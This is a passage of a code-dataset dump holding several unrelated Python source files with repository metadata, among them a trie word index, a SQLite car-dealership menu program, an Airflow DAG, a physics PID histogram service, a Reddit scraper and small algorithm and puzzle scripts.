cmds[\"finished\"].append(item)\n show(cmds)\n\nasyncio.run(main())\n","repo_name":"lssv6/misque","sub_path":"operations_scripts/dbnormalizer.py","file_name":"dbnormalizer.py","file_ext":"py","file_size_in_byte":2143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30471215795","text":"import re\nfrom pathlib import Path\nfrom typing import Optional\n\n\nclass Node(object):\n\n def __init__(self) -> None:\n self.children: dict = {}\n\n\nclass Document:\n\n def 
__init__(self, path: str) -> None:\n\n path: Path = Path(path)\n self.doc_id = str(path)[7:].replace(\"\\\\\", \"/\")\n self.word_loc_map = {}\n self.size = 0\n\n content = path.read_text(encoding=\"ascii\", errors=\"ignore\")\n self.__tokenize_document(\n re.sub(r\"[^\\w\\s]\", \"\", content).replace(\"\\n\", \" \"))\n\n def __tokenize_document(self, content: str) -> None:\n start = 0\n while start < len(content):\n\n if content[start].isalnum():\n\n stop = content.find(\" \", start)\n word = content[start:stop]\n self.word_loc_map[word] = self.word_loc_map.get(\n word, []) + [(self.doc_id, start, stop)]\n\n start = stop + 1\n self.size += 1\n\n else:\n start += 1\n\n\nclass Trie:\n\n ENDWORD: str = \"^\"\n\n def __init__(self) -> None:\n\n self._root: Node = Node()\n\n @property\n def tree(self):\n return self._root\n\n @tree.setter\n def tree(self, doc: Document) -> None:\n\n for word, locs in doc.word_loc_map.items():\n node = self._root\n # adding words\n for letter in word:\n\n if letter not in node.children:\n node.children[letter] = Node()\n\n node = node.children[letter]\n\n if Trie.ENDWORD not in node.children:\n node.children[Trie.ENDWORD] = locs\n\n else:\n node.children[Trie.ENDWORD].extend(locs)\n\n def complete(\n self,\n word: str) -> Optional[tuple[str, Optional[tuple[str, int, int]]]]:\n\n tokenized_word = word.split() # prefix tokenization\n\n matches = {}\n\n for w in tokenized_word:\n s = self.match(self._root, w, w)\n\n for i, locs in s:\n matches[i] = matches.get(i, []) + locs\n\n return matches\n\n @staticmethod\n def match(node: Node, prefix: str,\n trace: str) -> Optional[tuple[str, Optional[str]]]:\n\n prefix_matching = []\n\n if prefix == trace:\n\n for prefix_char in trace:\n\n if prefix_char not in node.children:\n return prefix_matching\n\n node = node.children[prefix_char]\n\n for postfix_char in node.children:\n\n if postfix_char == Trie.ENDWORD:\n prefix_matching.extend([(trace, node.children[postfix_char])])\n\n else:\n prefix_matching.extend(\n Trie.match(node.children[postfix_char], prefix,\n trace + postfix_char))\n\n return prefix_matching\n","repo_name":"Qazalbash/Data-Structures","sub_path":"python/trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"19002874235","text":"from __future__ import absolute_import\nfrom django.db import models\nfrom rapidsms.models import Contact\n\nclass LogisticsProfile(models.Model):\n organization = models.CharField(max_length=255, blank=True, null=True)\n contact = models.OneToOneField(Contact, null=True, blank=True)\n\n class Meta:\n abstract = True\n \n def get_or_create_contact(self):\n if self.contact is not None:\n return self.contact\n contact = Contact(name=self.user.username)\n contact.save()\n self.contact = contact\n self.save()\n return self.contact\n\n","repo_name":"viyouen/logistics","sub_path":"logistics_project/apps/ewsghana/extensions/logistics/logisticsprofile.py","file_name":"logisticsprofile.py","file_ext":"py","file_size_in_byte":591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"30026620554","text":"import sqlite3\nimport os.path\n\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\ndb_path = os.path.join(BASE_DIR, \"Project.db\")\nconn = sqlite3.connect(db_path)\nc = conn.cursor()\n\ngCars = []\ngOrderNumber = 0\ngTotal = 0\ngCheck = -1\n\ndef search_car():\n global gTotal\n global gCheck\n global gCars\n\n 
search = input(\"Enter 1 to search by model; \\tEnter 2 for manufacturer; \\tEnter 3 for transmission; \\tEnter 4 for price: \")\n if search == '1':\n model = input(\"Enter model you are looking for: \")\n query = \"SELECT * FROM car WHERE model = ?\"\n c.execute(query,[model])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6])\n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n elif search == '2':\n manu = input(\"Enter manufacturer you are looking for: \")\n query = \"SELECT * FROM car WHERE manufacturer = ?\"\n c.execute(query, [manu])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6])\n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n elif search == '3':\n trans = input(\"Enter transmission you are looking for: \")\n query = \"SELECT * FROM car WHERE transmission = ?\"\n c.execute(query, [trans])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6]) \n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n elif search == '4':\n value = input(\"Enter the price : \")\n sign = input(\"Enter 1 for greater; Enter 2 for less than: \")\n if sign == '1':\n query = \"SELECT * FROM car WHERE price > ?\"\n c.execute(query, [value])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6]) \n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n elif sign == '2':\n query = \"SELECT * FROM car WHERE price < ?\"\n c.execute(query, [value])\n for row in c.fetchall():\n print(row)\n #print(row[0], \" , \", row[1], \" , \", row[2],\" , \", row[3], \" , MPG: \", row[4],\" , Price:$\", row[5],\" , Car ID: \", row[6])\n print(\"(Model,Manufacturer, Stock,Transmission, Fuel Efficiency,Price,Car ID)\")\n \n\ndef cart():\n\n #ID from car search as parameter. \n id = '0'\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n\n checkoutid = int(input(\"Enter your checkout ID: \"))\n gCheck = checkoutid + 6000\n\n while id != 'x':\n\n id = input(\"Enter the car id you will like to add to cart; \\tEnter x to exit: \")\n\n query = \"SELECT * FROM car WHERE carid = ?\"\n c.execute(query,[id])\n for row in c.fetchall():\n print(row, \" Has been added to your cart\")\n gCars.append(row[6])\n gTotal = gTotal + row[5]\n \n\ndef payment():\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n\n option = '1'\n while option != 'x':\n option = input(\"Enter 1 to checkout; \\tEnter 2 to make payment; \\tEnter 3 to cancel order; \\tEnter x to exit: \")\n if option == '1':\n print(\"Order Placed!\")\n elif option == '2':\n ordernum = int(input(\"Enter your checkout ID : \"))\n ordernum += 6000\n while(gTotal > 0):\n print(\"Amount Due: \", gTotal)\n payment = int(input(\"Enter the amount you wish to pay : \"))\n if(payment < 0 or payment > gTotal):\n print(\"Invalid payment amount. Please try again.\")\n gTotal -= payment\n query = \"UPDATE checkoutservice SET total = (total - ?) 
WHERE checkoutid = ?\"\n\n c.execute(query,[payment,ordernum])\n\n query2 = \"SELECT total FROM checkoutservice WHERE checkoutid = ?\"\n c.execute(query2,[ordernum])\n for row in c.fetchall():\n print(\"Remaining total: \",row)\n\n conn.commit()\n print(\"Order Complete. You have purchased : \")\n for row in gCars:\n query = \"SELECT * FROM car WHERE carid = ?\"\n c.execute(query,[row])\n for col in c.fetchall():\n print(col)\n elif option == '3':\n custid = int(input(\"Enter your customer ID: \"))\n custid += 3000\n orderid = int(input(\"Enter the order you will like to cancel: \"))\n orderid += 1000\n query = \"SELECT custid FROM customer WHERE custid = ?\"\n c.execute(query, [custid])\n query = \"DELETE FROM customer WHERE ordernumber = ? AND custid = ?\"\n c.execute(query,[orderid,custid])\n query = \"DELETE FROM accountant WHERE ordernumber = ?\"\n c.execute(query,[orderid])\n gTotal = 0\n gCheck = -1\n gCars = []\n gOrderNumber = 0\n print(\"Order has now been deleted\")\n conn.commit()\n\ndef manpayment():\n\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n ordernum = int(input(\"Enter your checkout ID to make payment: \"))\n ordernum += 6000\n payment = int(input(\"Enter the amount you wish to pay: \"))\n query = \"UPDATE checkoutservice SET total = (total - ?) WHERE checkoutid = ?\"\n c.execute(query, [payment, ordernum])\n query2 = \"SELECT total FROM checkoutservice WHERE checkoutid = ?\"\n c.execute(query2, [ordernum])\n for row in c.fetchall():\n print(\"New total: \", row)\n\n conn.commit()\n\ndef mancancel():\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n\n custid = int(input(\"Enter the customer ID: \"))\n custid += 3000\n query = \"SELECT ordernumber FROM customer WHERE custid = ?\"\n c.execute(query, [custid])\n for row in c.fetchall():\n print(\"Order number for the customer: \", row)\n orderid = int(input(\"Enter the order you will like to cancel: \"))\n orderid += 1000\n\n query = \"DELETE FROM customer WHERE ordernumber = ? AND custid = ?\"\n c.execute(query, [orderid, custid])\n query = \"DELETE FROM accountant WHERE ordernumber = ?\"\n c.execute(query, [orderid])\n print(\"Order has now been deleted\")\n conn.commit()\n\n\ndef manrefund():\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n ordernum = int(input(\"Enter the order number to issue the refund: \"))\n ordernum += 1000\n query = \"UPDATE refund SET orderstatus = 'T' WHERE ordernumber = ?\"\n c.execute(query,[ordernum])\n query1 = \"SELECT * FROM refund WHERE ordernumber = ?\"\n c.execute(query1, [ordernum])\n for row in c.fetchall():\n print(\"Refund processed! \" , row)\n\n conn.commit()\n\ndef mandelete():\n global gTotal\n global gCheck\n global gCars\n global gOrderNumber\n custid = '0'\n areyousure = '0'\n\n while custid != \"exit\":\n\n custid = input(\"Enter the customer ID to delete customer info; \\tEnter exit to quit: \")\n newCustID = int(custid)\n newCustID += 3000\n\n while areyousure != 'x':\n\n areyousure = input(\"Are you sure you want to delete this information? 
\\tEnter y for yes; n for no: \")\n\n if areyousure == 'y':\n\n query = \"DELETE FROM customer WHERE custid = ?\"\n\n c.execute(query, [custid])\n\n areyousure = 'x'\n\n\n\n elif areyousure == 'n':\n\n areyousure = 'x'\n\n\n\n\n\n\n\n\nkey = '100'\n\nwhile key != '3':\n\n key = input(\"Enter 1 to enter customer mode; Enter 2 to enter management mode; Enter 3 to exit: \")\n\n if key == '1':\n\n while key != '0':\n\n request = input(\"Enter 1 to search car; Enter 2 to add to cart or check cart; Enter 3 to checkout or make payment or cancel order; Enter 0 to return to original options: \")\n\n if request == '1':\n search_car()\n elif request == '2':\n cart()\n elif request == '3':\n payment()\n elif request == '0':\n key = '0'\n\n elif key == '2':\n\n password = input(\"Enter management password: \")\n manpass = '1234'\n\n if password == manpass:\n\n while key != '0':\n\n manmode = input(\"Enter 1 to make payment; \\tEnter 2 to cancel order; \\tEnter 3 to issue refund; \\tEnter 4 to delete customer info; \\tEnter 0 to exit: \")\n\n if manmode == '1':\n manpayment()\n elif manmode == '2':\n mancancel()\n elif manmode == '3':\n manrefund()\n elif manmode == '4':\n mandelete()\n elif manmode == '0':\n key = '0'\n elif password != manpass:\n\n print('Access Denied')\n elif key == '3':\n c.close()\n conn.close()","repo_name":"mmendezjimenez/CSE111","sub_path":"Project/Phase3/CarDealership.py","file_name":"CarDealership.py","file_ext":"py","file_size_in_byte":9457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72020620329","text":"from datetime import timedelta\nfrom airflow.decorators import dag, task\nfrom airflow.utils.dates import days_ago\n\nimport requests \n\nENDPOINT = 'https://gorest.co.in/public/v2/posts'\n\ndefault_args = {\n 'start_date': days_ago(1),\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n 'schedule_interval': '@daily',\n 'tags': ['training'],\n 'catchup': False\n}\n\n@dag(\n dag_id = 'extract-decorate',\n default_args=default_args\n)\ndef example_dag():\n @task\n def extract():\n return requests.get(ENDPOINT).json()\n @task\n def transform(data):\n return {'no_records': len(data)}\n @task\n def load(data):\n print(\n f'No. of records fetched by {ENDPOINT}: {data[\"no_records\"]}'\n )\n load(transform(extract()))\ndag = example_dag()","repo_name":"yoonjk/airflow-handson","sub_path":"lab01/extract-decorate.py","file_name":"extract-decorate.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14626400257","text":"#\n# author: J.L. 
Lanfranchi\n#\n# date: March 2, 2016\n\"\"\"\nPID service using info directly from events.\n\"\"\"\n\nimport collections\nfrom itertools import izip\n\nimport numpy as np\n\nfrom pisa.utils.log import logging\nfrom pisa.pid.PIDServiceBase import PIDServiceBase\nfrom pisa.utils.utils import get_bin_sizes\nimport pisa.utils.flavInt as flavInt\nfrom pisa.utils.events import Events\nfrom pisa.utils.PIDSpec import PIDSpec\nfrom pisa.utils.dataProcParams import DataProcParams\n\n# TODO: implement cuts via pertinent DataProcParams\n\nclass PIDServiceMC(PIDServiceBase):\n \"\"\"\n Takes a PISA events HDF5 file and creates 2D-histogrammed PID in terms of\n energy and coszen, for each specified particle \"signature\" (aka ID).\n \"\"\"\n def __init__(self, ebins, czbins, pid_events, pid_ver,\n pid_remove_true_downgoing, pid_spec=None,\n pid_spec_source=None, compute_error=False,\n #replace_invalid=False, **kwargs):\n replace_invalid=True, **kwargs):\n #super(PIDServiceBase, self).__init__(ebins, czbins)\n super(PIDServiceBase, self).__init__()\n\n self.events_source = None\n self.events = None\n self.cut_events = None\n self.data_proc_params = None\n self.pid_remove_true_downgoing = None\n\n self.pid_ver = None\n self.pid_spec = None\n self.pid_spec_source = pid_spec_source\n\n self.compute_error = compute_error\n self.error_computed = False\n self.replace_invalid = replace_invalid\n\n self.get_pid_kernels(\n ebins=ebins, czbins=czbins, pid_events=pid_events, pid_ver=pid_ver,\n pid_remove_true_downgoing=pid_remove_true_downgoing,\n pid_spec=pid_spec, compute_error=compute_error,\n replace_invalid=replace_invalid,\n )\n\n def get_pid_kernels(self, ebins, czbins, pid_events, pid_ver,\n pid_remove_true_downgoing=None, pid_spec=None,\n compute_error=None, replace_invalid=None):\n \"\"\"Compute and return PID maps\"\"\"\n # Default to values passed when class was instantiated\n if pid_remove_true_downgoing is None:\n pid_remove_true_downgoing = self.pid_remove_true_downgoing\n if replace_invalid is None:\n replace_invalid = self.replace_invalid\n if compute_error is None:\n compute_error = self.compute_error\n\n # TODO: add stateful return-early logic\n #if ebins == self.ebins and \\\n # czbins == self.czbins and \\\n # pid_events == self.events_source and \\\n # pid_ver == self.pid_ver and \\\n # pid_spec == self.pid_spec and \\\n # (not compute_error or (compute_error == self.compute_error)):\n # return\n self.ebins = ebins\n self.czbins = czbins\n\n histo_binspec = (self.ebins, self.czbins)\n n_ebins = len(self.ebins) - 1\n n_czbins = len(self.czbins) - 1\n self.compute_error = compute_error\n logging.info('Updating PIDServiceMC PID histograms...')\n\n self.pid_remove_true_downgoing = pid_remove_true_downgoing\n\n new_events = False\n if self.events is None or pid_events != self.events_source:\n new_events = True\n if isinstance(pid_events, basestring):\n logging.info('Extracting events from file: %s' % (pid_events))\n self.events = Events(pid_events)\n elif isinstance(pid_events, Events):\n # Validate by (re)instantiating as an Events object\n self.events = pid_events\n else:\n raise TypeError('Unhandled `pid_events` type: \"%s\"' %\n type(pid_events))\n should_be_joined = sorted([\n flavInt.NuFlavIntGroup('nuecc+nuebarcc'),\n flavInt.NuFlavIntGroup('numucc+numubarcc'),\n flavInt.NuFlavIntGroup('nutaucc+nutaubarcc'),\n flavInt.NuFlavIntGroup('nuallnc+nuallbarnc'),\n ])\n are_joined = sorted([\n flavInt.NuFlavIntGroup(s)\n for s in self.events.metadata['flavints_joined']\n ])\n if are_joined != 
should_be_joined:\n raise ValueError('Events passed have %s joined groupings but'\n ' it is required to have %s joined groupings.'\n % (are_joined, should_be_joined))\n self.events_source = pid_events\n self.data_proc_params = DataProcParams(\n detector=self.events.metadata['detector'],\n proc_ver=self.events.metadata['proc_ver']\n )\n\n if new_events or (self.cut_events is None) or \\\n (pid_remove_true_downgoing != self.pid_remove_true_downgoing):\n if pid_remove_true_downgoing:\n self.cut_events = self.data_proc_params.applyCuts(\n self.events, cuts='true_upgoing_coszen'\n )\n else:\n self.cut_events = self.events\n self.pid_remove_true_downgoing = pid_remove_true_downgoing\n\n if new_events or (self.pid_spec is None) or (pid_ver != self.pid_ver):\n self.pid_spec = PIDSpec(\n detector=self.events.metadata['detector'],\n geom=self.events.metadata['geom'],\n proc_ver=self.events.metadata['proc_ver'],\n pid_specs=self.pid_spec_source\n )\n self.signatures = self.pid_spec.get_signatures()\n\n # TODO: add importance weights, error computation\n\n logging.info(\"Separating events by PID...\")\n self.separated_events = self.pid_spec.applyPID(\n events=self.cut_events,\n return_fields=['reco_energy', 'reco_coszen', 'weighted_aeff'],\n )\n\n self.pid_kernels = {'binning': {'ebins': self.ebins,\n 'czbins': self.czbins}}\n self.pid_kernels_rel_error = {'binning': {'ebins': self.ebins,\n 'czbins': self.czbins}}\n for label in ['nue_cc', 'numu_cc', 'nutau_cc', 'nuall_nc']:\n rep_flavint = flavInt.NuFlavIntGroup(label)[0]\n self.pid_kernels[label] = {}\n raw_histo = {}\n raw_histo_err = {}\n total_histo = np.zeros([n_ebins, n_czbins])\n total_histo_check = None\n if self.compute_error:\n total_err2 = np.zeros([n_ebins, n_czbins])\n\n for sig in self.signatures:\n flav_sigdata = self.separated_events[rep_flavint][sig]\n reco_e = flav_sigdata['reco_energy']\n reco_cz = flav_sigdata['reco_coszen']\n try:\n weights = flav_sigdata['importance_weight']\n #weights = flav_sigdata['weighted_aeff']\n weights2 = weights * weights\n weights_check = self.cut_events[rep_flavint]['importance_weight']\n #weights_check = self.cut_events[rep_flavint]['weighted_aeff']\n except:\n logging.warn('No importance weights found in events!')\n weights = None\n weights2 = None\n weights_check = None\n raw_histo[sig], _, _ = np.histogram2d(\n reco_e,\n reco_cz,\n weights=weights,\n bins=histo_binspec,\n )\n total_histo += raw_histo[sig]\n\n if self.compute_error:\n raw_histo_err[sig], _, _ = np.histogram2d(\n reco_e,\n reco_cz,\n weights=weights2,\n bins=histo_binspec,\n )\n total_err2 += raw_histo_err[sig] / \\\n (np.clip(raw_histo[sig], 1, np.inf)**2)\n self.error_computed = True\n\n for sig in self.signatures:\n self.pid_kernels[label][sig] = raw_histo[sig] / total_histo\n if np.any(total_histo == 0):\n self.pid_kernels[label][sig] = np.nan_to_num(self.pid_kernels[label][sig])\n\n invalid_idx = total_histo == 0\n valid_idx = 1-invalid_idx\n invalid_idx = np.where(invalid_idx)[0]\n num_invalid = len(invalid_idx)\n\n message = 'Group \"%s\", PID signature \"%s\" has %d invalid' \\\n ' entry(ies)!' 
% (label, sig, num_invalid)\n\n if num_invalid > 0 and not replace_invalid:\n pass\n #raise ValueError(message)\n\n replace_idx = []\n if num_invalid > 0 and replace_invalid:\n logging.warn(message)\n valid_idx = np.where(valid_idx)[0]\n for idx in invalid_idx:\n dist = np.abs(valid_idx-idx)\n nearest_valid_idx = valid_idx[np.where(dist==np.min(dist))[0][0]]\n replace_idx.append(nearest_valid_idx)\n self.pid_kernels[label][sig][idx] = \\\n self.pid_kernels[label][sig][nearest_valid_idx]\n\n # Relative error is same for all signatures, since equations\n # implemented are\n # pidhist_x / (pidhist_x + pidhist_y + ...)\n # pidhist_y / (pidhist_x + pidhist_y + ...)\n # ...\n if self.compute_error:\n if replace_invalid:\n for orig_idx, repl_idx in izip(invalid_idx, replace_idx):\n total_err2[orig_idx] = total_err2[repl_idx]\n #total_err2[total_err2 == 0] = \\\n # np.min(total_err2[total_err2 != 0])\n self.pid_kernels_rel_error[label] = np.sqrt(total_err2)\n\n return self.pid_kernels\n\n def get_pid(self, **kwargs):\n \"\"\"Returns the PID maps\"\"\"\n return self.pid_kernels\n \n def get_rel_error(self):\n \"\"\"Returns the PID maps' relative error\"\"\"\n assert self.error_computed\n return self.pid_kernels_rel_error\n\n @staticmethod\n def add_argparser_args(parser):\n parser.add_argument(\n '--pid-events', metavar='RESOURCE_NAME', type=str,\n default='events/pingu_v36/events__pingu__v36__runs_388-390__proc_v5__joined_G_nue_cc+nuebar_cc_G_numu_cc+numubar_cc_G_nutau_cc+nutaubar_cc_G_nuall_nc+nuallbar_nc.hdf5',\n help='''[ PID-MC ] PISA-standard events file'''\n )\n parser.add_argument(\n '--pid-ver', type=str,\n default='1',\n help='''[ PID-MC ] Version of PID to use (as defined for this\n detector/geometry/processing)'''\n )\n parser.add_argument(\n '--pid-remove-true-downgoing', action='store_true',\n help='''[ PID-MC ] Remove MC-true-downgoing events'''\n )\n parser.add_argument(\n '--pid-spec-source', default='pid/pid_specifications.json',\n help='''[ PID-MC ] Resource for loading PID specifications'''\n )\n parser.add_argument(\n '--compute-error', action='store_true',\n help='''[ PID-MC ] Compute histogram errors'''\n )\n parser.add_argument(\n '--replace-invalid', action='store_true',\n help='''[ PID-MC ] Replace invalid histogram entries with nearest\n neighbor's value'''\n )\n return parser\n","repo_name":"yanshu/pisa","sub_path":"pisa/pid/PIDServiceMC.py","file_name":"PIDServiceMC.py","file_ext":"py","file_size_in_byte":11613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31785307697","text":"import pandas as pd\nimport RedditReadonlyService\n\nclientId = \"\" # your bots client id\nclientSecret = \"\" # your bots client secret\nuserAgent = \"\" # your bots user agent\n\nredditReadOnly = RedditReadonlyService.getRedditReadOnly()\n\nsubmissionsDict = {\n \"author\": [],\n \"author_fullname\": [],\n \"created_utc\": [],\n \"id\": [],\n \"num_comments\": [],\n \"permalink\": [],\n \"score\": [],\n \"selftext\": [],\n \"subreddit\": [],\n \"title\": [],\n \"upvote_ratio\": [],\n \"url\": []\n}\nsubmissionsDataFrame = pd.read_csv ('data/Brew-Crew-Submissions.csv')\nfor index, row in submissionsDataFrame.iterrows():\n submissionDataFrame = redditReadOnly.submission(row['id'])\n submission = redditReadOnly.submission(submissionDataFrame.id)\n submissionsDict[\"author\"].append(submission.author)\n submissionsDict[\"author_fullname\"].append(submission.author_fullname)\n 
submissionsDict[\"created_utc\"].append(submission.created_utc)\n submissionsDict[\"id\"].append(submission.id)\n submissionsDict[\"num_comments\"].append(submission.num_comments)\n submissionsDict[\"permalink\"].append(submission.permalink)\n submissionsDict[\"score\"].append(submission.score)\n submissionsDict[\"selftext\"].append(submission.selftext)\n submissionsDict[\"subreddit\"].append(submission.subreddit)\n submissionsDict[\"title\"].append(submission.title)\n submissionsDict[\"upvote_ratio\"].append(submission.upvote_ratio)\n submissionsDict[\"url\"].append(submission.url)\n\n# Saving the data in a pandas dataframe\nsubmissionsDataFrame = pd.DataFrame(submissionsDict)\n\n# Save data frame to csv\nsubmissionsDataFrame.to_csv(\"data/Brew-Crew-Submissions-2022.csv\", index=True, index_label=\"index\")","repo_name":"andersbuck/reddit-meetup-data","sub_path":"scripts/2-fetch-submissions.py","file_name":"2-fetch-submissions.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33051245802","text":"\n\ndef from_file(path):\n with open(path, 'r') as handle:\n return [int(line) for line in handle.readlines()[1:]]\n\n\ndef mwis(path):\n A = [0, path[0]]\n for i in range(2, len(path) + 1):\n A.append(max((A[i-1], A[i-2] + path[i-1])))\n return reconstruct(path, A)\n\n\ndef reconstruct(path, A):\n S = []\n test_bits = [1, 2, 3, 4, 17, 117, 517, 997]\n i = len(A)-1\n while i > 1:\n # Do not include node\n if A[i-1] >= A[i-2] + path[i-1]:\n i -= 1\n # Include node and exclude next node\n else:\n S.append(i)\n i -= 2\n # Check our base cases\n if i == 1:\n S.append(1)\n # Reverse the created string as we are travelling backwards\n ans = ''.join([str(int(bit in S)) for bit in test_bits])\n return ans\n","repo_name":"Wenchonghe/stanford-algs","sub_path":"greedy-algorithms/assignment_3/mwis.py","file_name":"mwis.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"33704539305","text":"# This is kind of messy, these should probably be more centralized\nfrom portal.planning.objects import *\n\nclass Predicate:\n def __init__(self, name, types):\n self.name = name\n self.types = types\n\n def __call__(self, *args):\n if len(self.types) != len(args):\n raise Exception('wrong number of arguments in predicate (%s %s)' %\n (self.name, ' '.join([arg.name for arg in args])))\n\n for typ, obj in zip(self.types, args):\n if not isinstance(obj, typ):\n raise Exception('%s does not have type %s in predicate (%s %s)' %\n (obj.name, typ.type(), self.name,\n ' '.join([arg.name for arg in args])))\n return PredicateInstance(self, args)\n\nclass PredicateInstance:\n def __init__(self, predicate, args):\n self.predicate = predicate\n self.args = args\n\n def serialize(self):\n return [self.predicate.name] + [arg.name for arg in self.args]\n\n def __hash__(self):\n return hash((self.predicate.name, self.args))\n\n def __eq__(self, other):\n return self.predicate == other.predicate and self.args == other.args\n\n def __repr__(self):\n return '(%s %s)' % (self.predicate.name, ' '.join([arg.name for arg in self.args]))\n\nAt = Predicate(\n 'at', [Entity, Location]\n)\nConnected = Predicate(\n 'connected', [Location, Location]\n)\nCarrying = Predicate(\n 'carrying', [Player, Item]\n)\nConnectorConnects = Predicate(\n 'connector-connects', [Connector, Room, Room]\n)\nDoorRequires = Predicate(\n 'door-requires', [Door, 
Button]\n)\nCanCreatePortal = Predicate(\n 'can-create-portal', [Player, Portal]\n)\nCanCreatePortalAt = Predicate(\n 'can-create-portal-at', [Location, Location]\n)\n","repo_name":"michaelelin/portal_planner","sub_path":"portal/planning/predicates.py","file_name":"predicates.py","file_ext":"py","file_size_in_byte":1792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40465671278","text":"'''vasum_Farmer_Fox.py\r\nby Vasu Mehra\r\n\r\nAssignment 2, in CSE 415, Spring 2019.\r\n \r\nThis file contains my problem formulation for the problem of\r\nthe Farmer, Fox, Chicken, and Grain.\r\n'''\r\n#\r\nSOLUZION_VERSION = \"2.0\"\r\nPROBLEM_NAME = \"Farmer, Chicken, Fox, Grain\"\r\nPROBLEM_VERSION = \"2.0\"\r\nPROBLEM_AUTHORS = ['S. Tanimoto']\r\nPROBLEM_CREATION_DATE = \"17-APRIL-2019\"\r\n\r\n# The following field is mainly for the human solver, via either the Text_SOLUZION_Client.\r\n# or the SVG graphics client.\r\nPROBLEM_DESC=\\\r\n '''The \"Missionaries and Cannibals\" problem is a traditional puzzle\r\nin which the player starts off with three missionaries and three cannibals\r\non the left bank of a river. The object is to execute a sequence of legal\r\nmoves that transfers them all to the right bank of the river. In this\r\nversion, there is a boat that can carry at most three people, and one of\r\nthem must be a missionary to steer the boat. It is forbidden to ever\r\nhave one or two missionaries outnumbered by cannibals, either on the\r\nleft bank, right bank, or in the boat. In the formulation presented\r\nhere, the computer will not let you make a move to such a forbidden situation, and it\r\nwill only show you moves that could be executed \"safely.\"\r\n'''\r\n#\r\n\r\n#\r\n#\r\nFarmer = 0\r\nFox = 1\r\nChicken = 2\r\nGrain = 3\r\nLEFT = 0\r\nRIGHT = 1\r\n\r\nclass State():\r\n\r\n\tdef __init__(self, d=None):\r\n\t\tif d==None: \r\n\t\t d = {'people':[[0,0],[0,0],[0,0],[0,0]],\r\n\t\t 'boat':LEFT}\r\n\t\tself.d = d\r\n\r\n\tdef __eq__(self,s2):\r\n\t for prop in ['people', 'boat']:\r\n\t if self.d[prop] != s2.d[prop]: return False\r\n\t return True\r\n\r\n\tdef __str__(self):\r\n\t p = self.d['people']\r\n\t txt = \"\\n Farmer on left:\"+str(p[Farmer][LEFT])+\"\\n\"\r\n\t txt += \" Fox on left:\"+str(p[Fox][LEFT])+\"\\n\"\r\n\t txt += \" Chicken on left:\"+str(p[Chicken][LEFT])+\"\\n\"\r\n\t txt += \" Grain on left:\"+str(p[Grain][LEFT])+\"\\n\"\r\n\t txt = \" Farmer on right:\"+str(p[Farmer][RIGHT])+\"\\n\"\r\n\t txt += \" Fox on right:\"+str(p[Fox][RIGHT])+\"\\n\"\r\n\t txt += \" Chicken on right:\"+str(p[Chicken][RIGHT])+\"\\n\"\r\n\t txt += \" Grain on right:\"+str(p[Grain][RIGHT])+\"\\n\"\r\n\t side='left'\r\n\t if self.d['boat']==1: side='right'\r\n\t txt += \" boat is on the \"+side+\".\\n\"\r\n\t return txt\r\n\r\n\tdef __hash__(self):\r\n\t\treturn (self.__str__()).__hash__()\r\n\r\n\tdef copy(self):\r\n\t # Performs an appropriately deep copy of a state,\r\n\t # for use by operators in creating new states.\r\n\t news = State({})\r\n\t news.d['people']=[self.d['people'][F_F_C_G][:] for F_F_C_G in [Farmer, Fox, Chicken, Grain]]\r\n\t news.d['boat'] = self.d['boat']\r\n\t return news \r\n\r\n\tdef can_move (self, farmer, fox, chic, grain):\r\n\t\tside = self.d['boat'] # Where the boat is.\r\n\t\tp = self.d['people']\r\n\t\tif(farmer != 1):\r\n\t\t\treturn False\r\n\r\n\t\tFarmer_present = p[Farmer][side]\r\n\t\tFox_present = p[Fox][side]\r\n\t\tChicken_present = p[Chicken][side]\r\n\t\tGrain_present = 
